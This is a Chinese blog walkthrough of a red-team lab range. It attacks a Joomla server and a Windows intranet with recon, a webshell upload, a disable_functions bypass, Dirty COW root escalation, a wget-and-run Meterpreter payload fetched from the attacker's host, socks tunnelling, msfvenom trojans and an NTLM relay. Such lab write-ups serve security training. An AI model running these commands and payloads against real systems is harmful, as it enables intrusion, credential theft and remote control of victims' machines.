网站后台登陆口,农产品网络营销,工单系统设计,win7本地架设网站#x1f36c; 博主介绍#x1f468;#x1f393; 博主介绍#xff1a;大家好#xff0c;我是 hacker-routing #xff0c;很高兴认识大家~
✨主攻领域#xff1a;【渗透领域】【应急响应】 【ATKCK红队评估实战靶场】 【VulnHub靶场复现】【面试分析】
#x1f… 博主介绍 博主介绍大家好我是 hacker-routing 很高兴认识大家~
✨主攻领域【渗透领域】【应急响应】 【ATKCK红队评估实战靶场】 【VulnHub靶场复现】【面试分析】
点赞➕评论➕收藏 养成习惯一键三连
欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋
作者水平有限欢迎各位大佬指点相互学习进步 目录
一、环境搭建
1.靶场下载
2.拓扑图
3.配置环境 二、外网渗透
1.信息收集
2.目录扫描
joomscan扫描
3.远程连接MySQL
4.getshell
5.LD_PRELOAD绕过
三、内网渗透
1.内网信息收集
信息收集总结
2.ssh远程连接
3.脏牛提权
4.msf监听
5.msf后渗透
6.基于EarthWorm的正反向socks5代理
1.我们首先要添加路由转发sock代理
2.Socks5代理
四、横向移动
1.NTLM Relay 攻击
1.msf生成木马
2.抓取用户的Net-NTLM Hash的过程 一、环境搭建
1.靶场下载
靶场下载地址
https://pan.baidu.com/s/1iy4MIy6ni6d9F3iypeCYVQ
提取码7mhi2.拓扑图 web-centos一进入
service network restart 重启网络服务
3.配置环境
kaliweb-centosweb-ubantupcwin 2008win 2012内网192.168.93.100192.168.93.120192.168.93.30192.168.93.20192.168.93.10192.168.43.157192.168.43.57 二、外网渗透
1.信息收集
发现centos机器的外网IP地址是192.168.43.57
┌──(rootkali)-[~/桌面]
└─# arp-scan -l ┌──(rootkali)-[~/桌面]
└─# nmap -sS -A 192.168.43.57
扫描发现开放了22、80、3306端口 2.目录扫描
┌──(rootkali)-[~/桌面]
└─# dirsearch -u http://192.168.43.57 需要输入账号密码可以尝试弱口令发现失败了 joomscan扫描
┌──(rootkali)-[~/桌面]
└─# joomscan -u http://192.168.43.57版本joomla 3.9.12可以利用msf的payload试试 还有很多目录都可以扫描出来 想使用msf渗透但是没有找到模块 /configuration.php~目录下面找到了数据库的账户密码
想到开始端口扫描的时候开放了3306端口所以这里mysql是目前要尝试利用的地方
$user testuser
$password cvcvgjASD!3.远程连接MySQL 一般账号密码在数据库的user表中直接检索然后进行查找 发现这个是administrator最高用户所以可以修改密码然后进行登录 账号administrator
密码123456也可以登录mysql进行修改password
mysql -h 192.168.43.57 -u testuser -pmysql select * from am2zu_users;update am2zu_users set password md5(123456) where id 891; #修改password 4.getshell
点击Bee3 Details and Files 写入getshell木马 木马上传的文件位置/templates/beez3/ 最终地址
http://192.168.43.57/templates/beez3/error.php 连接蚁剑 打开终端发现无法输入命令 查看phpinfo发现确实设置了disable_functions 5.LD_PRELOAD绕过
payload下载
GitHub - yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD: bypass disable_functions via LD_PRELOA (no need /usr/sbin/sendmail)bypass disable_functions via LD_PRELOA (no need /usr/sbin/sendmail) - GitHub - yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD: bypass disable_functions via LD_PRELOA (no need /usr/sbin/sendmail)https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD
蚁剑的插件市场里面也有 LD_PRELOAD绕过 把这个再上传进去上传的目录一定要记住后面传参的时候要用到 说明这台机器我们就已经拿下来了 三、内网渗透
1.内网信息收集
ifconfiguname -a ##查看内核版本whoami #查看当前shell权限 www-data
id #uid33(www-data) gid33(www-data) groups33(www-data) 信息收集总结
我们可以发现我们开始是打算渗透进入centos靶机但是我们这里远程命令执行的命令回显出来的信息都是ubantu的靶机的
上网查了资料才知道原来是Centos是Ubuntu的反向代理用的是Nginx协议
最后在/tmp/mysql目录下找到了一个账号和密码
我们前面扫描centos靶机开放了22端口我们这里可以尝试下ssh远程连接
adduser wwwuser
passwd wwwuser_123Aqx2.ssh远程连接
┌──(rootkali)-[~/桌面]
└─# ssh wwwuser192.168.43.57 uname -an┌──(rootkali)-[~/桌面]
└─# searchsploit linux 2.6.32这里面有很多内核提权的方法我尝试了几个没有提权成功我后来是用脏牛提权法 查看版本Linux内核版本信息发现符合脏牛提权漏洞
3.脏牛提权
Linux kernel 2.6.222007年发行到2016年10月18日才修复
在可执行目录下一般在/tmp目录下
gcc -pthread dirty.c -o dirty -lcrypt ##编译dirty.c./dirty 123456id #显示用户的ID以及所属群组的IDuid0为root用户su firefart ##密码123456 4.msf监听
我们目前需要通过msf生成一个payload在CentOS上运行此payload建立 msf 和CentOS 的连接
kali 另外起一个msf进行监听
msf6 use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) show targets Exploit targets:Id Name-- ----0 Python1 PHP2 PSH3 Regsvr324 pubprn5 SyncAppvPublishingServer6 PSH (Binary)7 Linux8 Mac OS Xmsf6 exploit(multi/script/web_delivery) set target 7
target 7msf6 exploit(multi/script/web_delivery) set payload linux/x64/meterpreter/reverse_tcp
payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) set lhost 192.168.43.157
lhost 192.168.43.157
msf6 exploit(multi/script/web_delivery) options Module options (exploit/multi/script/web_delivery):Name Current Setting Required Description---- --------------- -------- -----------SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.SRVPORT 8080 yes The local port to listen on.SSL false no Negotiate SSL for incoming connectionsSSLCert no Path to a custom SSL certificate (default is randomly generated)URIPATH no The URI to use for this exploit (default is random)Payload options (linux/x64/meterpreter/reverse_tcp):Name Current Setting Required Description---- --------------- -------- -----------LHOST 192.168.43.157 yes The listen address (an interface may be specified)LPORT 4444 yes The listen portExploit target:Id Name-- ----7 Linux输入run之后会生成一个payload然后复制在CentOS上执行
执行之后就会出现下图红框的中的内容
[firefartlocalhost tmp]# wget -qO nPTCbkLP --no-check-certificate http://192.168.43.157:8080/KnZJ61asAFMH; chmod x nPTCbkLP; ./nPTCbkLP disown 5.msf后渗透
msf6 exploit(multi/script/web_delivery) sessions -lActive sessions
Id Name Type Information Connection-- ---- ---- ----------- ----------1 meterpreter x64/linux firefart localhost.localdomain (uid0, gid0, euid0, egid0) localhost.l... 192.168.43.157:4444 - 192.168.43.57:50264 (192.168.43.57)msf6 exploit(multi/script/web_delivery) sessions 1
[*] Starting interaction with 1...meterpreter 6.基于EarthWorm的正反向socks5代理
参考博客
基于EarthWorm的正反向socks5代理_socks5反向代理-CSDN博客文章浏览阅读3.9k次点赞3次收藏10次。EarthWorm是一套便携式的网络穿透工具具有 SOCKS v5服务架设和端口转发两大核心功能能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道直达网络深处_socks5反向代理https://blog.csdn.net/qq_44159028/article/details/122821861 1.我们首先要添加路由转发sock代理
添加路由是为了能让msf程序进入内网便于攻击earthworm搭建socks5反向代理服务 是为了让kali攻击者的程序进入内网可以扫描内网主机信息等ew流量走向本地流量–本地1080端口–web服务器1234端口利用EW-- 内网服务器 – web服务器的1234端口 – 本地1080端口
添加一个通向内网 192.168.93.0/24 网段的路由
route add 192.168.93.0 255.255.255.0 1
# 目的网段 192.168.93.0 子网掩码 255.255.255.0 下一跳地址 session 1
2.Socks5代理
使用earthworm搭建socks5反向代理
ew下载
GitHub - idlefire/ew: 内网穿透(跨平台)内网穿透(跨平台). Contribute to idlefire/ew development by creating an account on GitHub.https://github.com/idlefire/ew
kali攻击者
./ew_for_linux64 -s rcsocks -l 1080 -e 1234#将1080端口监听到的本地数据转发到 web服务器的1234端口# 通过1080端口将本地流量转发出去#rcsocks、rssocks 用于反向连接#ssocks 用于正向连接# -l 指定本地监听的端口# -e 指定要反弹到的机器端口# -d 指定要反弹到机器的IP# -f 指定要主动连接的机器 ip# -g 指定要主动连接的机器端口# -t 指定超时时长,默认为 1000在CentOS上传 ew_for_linux64
./ew_for_linux64 -s rssocks -d 192.168.43.157 -e 1234#192.168.43.157 是攻击者kali的IP地址 再回到kali终端 将socks5 服务器指向 127.0.0.1:1080
vim /etc/proxychains4.conf 这样我们就可以利用proxychains将我们的socks5代理进去到内网中了 scanner进行扫描
use auxiliary/scanner/discovery/udp_probe
set rhosts 192.168.93.0-255
set threads 5
run 四、横向移动
1.NTLM Relay 攻击
参考博客
NTLM-relay攻击的原理与实现_ntlmssp攻击-CSDN博客文章浏览阅读10w次点赞9次收藏17次。CATALOGNTLM相关1.用处2.认证流程其他术语NT-hash/NTLM-hashLM-hashNet-NTLM hashSSPISSPNTLM-relay原理不同版本的NTLM认证对应的responseNTLM-relay攻击如何获取到NET-NTLM hash通过responder或者inveigh工具Inveighresponder破解NET-NTLM hash(v2)其它方式的NTLM-relay攻击利用impacket的ntlmrelayssmb协议访问http协议访问参考文章NTLM相_ntlmssp攻击https://blog.csdn.net/qq_41874930/article/details/108825010
工具使用说明
impacket-master为了伪造smb服务器抓取用户的密码msf生成一个exe木马 结合impacket-master的smbrelayx.py使用通过NTLM Relay伪造的SMB服务器拿到密码利用msf拿下 win2008
大致的思路是攻击者在CentOS上面伪造一个恶意的SMB服务器当内网中有机器 Client1 访问这个攻击者精心构造好的SMB服务器时 smbrelayx.py 脚本将抓到 Client1 的 Net-NTLM Hash 然后 smbrelayx.py 用抓取到的 Client1 的 Net-NTLM Hash 重放给内网中的另一台机器 Client2
因此我们的思路就是通过msf生成的木马shell.exe上传到CentOS用smbrelayx.py执行然后CentOS上就会生成 伪造的SMB恶意服务器内网主机访问SMB并输入账号密码CentOS的上的恶意代码smbrelayx.py就会抓取内网主机的 Net-NTLM Hash返还给内网中的另一台主机本案例中为win 2008(192.168.93.20)并通过CentOS上的msf生成的shell.exe回传给kali攻击者然后内网目标主机通过msf的监听上线。1.msf生成木马
首先利用msf的msfvenom模块生成一个exe后缀木马开启远程桌面也是用到此模块
msfvenom -p windows/meterpreter/bind_tcp LHOST192.168.43.157 LPORT4567 -e x86/shikata_ga_nai -f exe -o shell.exe#192.168.43.157 是kali的IP地址 然后将木马上传到centos靶机上 Impacket下载位置
https://github.com/fortra/impacket/tree/master/exampleshttps://github.com/fortra/impacket/tree/master/examples
然后进入Impacket的examples目录执行如下命令
python3 smbrelayx.py -h 192.168.93.20 -e /tmp/shell.exe# 攻击信息都会反弹到192.168.93.20这台主机
但是这个靶机是没有python3的所以要安装python3 wget -c https://www.python.org/ftp/python/3.6.9/Python-3.6.9.tgz
tar -zvxf Python-3.6.9.tgz
cd Python-3.6.9
./configure --prefix/usr/local/python --with-openssl
make make installln -s /usr/local/python/bin/python3 /usr/bin/python3
ln -s /usr/local/python/bin/pip3 /usr/bin/pippip install --upgrade pip -i http://pypi.douban.com/simple/ --trusted-host pypi.douban.com
pip install six -i http://pypi.douban.com/simple/ --trusted-host pypi.douban.com pycryptodomex
pip install -i http://pypi.douban.com/simple/ --trusted-host pypi.douban.com pyOpenSSL
pip install -i http://pypi.douban.com/simple/ --trusted-host pypi.douban.com ldap3
pip install -i http://pypi.douban.com/simple/ --trusted-host pypi.douban.com pyasn1
pip install -i http://pypi.douban.com/simple/ --trusted-host pypi.douban.com impacket
但是我这里一直报错说没用权限所以没有成功 执行后会在CentOS上面启动一个smb服务和一个http服务http服务会跟nginx的80端口冲突所以需要事先停止nginx 服务
nginx -s stop 执行python3 smbrelayx.py -h 192.168.93.20 -e /tmp/shell.exe。此时如果内网中的
有域用户访问再次通过CentOS代理访问站点时访问的就不是之前的那个Joomla站点了而是攻
击者在CentOS上面搭建的一个恶意的smb服务会弹出一个认证页面 2.抓取用户的Net-NTLM Hash的过程
安全意识差的用户自然会输入自己的域用户密码然后smbrelayx.py就会抓取到该用户的Net-
NTLM Hash并重放给内网中的另一台机器 192.168.93.20Windows Server 2008成功后
会在Windows Server2008上面上传我们预先生成的木马shell.exe并执行。因为smbrelayx.py指定的是192.168.93.20这台主机
在msf上开启对 win 2008192.168.93.20的监听然后在win7上访问smb服务器使得win 2008成功上线顺序不能错一定要先开启监听在用win7登录smb伪造服务器
win8进行监听
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 192.168.93.20
set AutoRunScript post/windows/manage/migrate
run
这样就获取到win 2008的权限可以通过meterpreter 对win 2008进行后渗透
由于这里是靶机所以手动完成该域用户的认证过程就用 PC (Windows7) 上的用户访问吧。输入
用户名密码后smbrelayx.py成功抓取到该用户的Net-NTLM Hash 这样就获取到win 2008的权限可以通过meterpreter 对win 2008进行后渗透
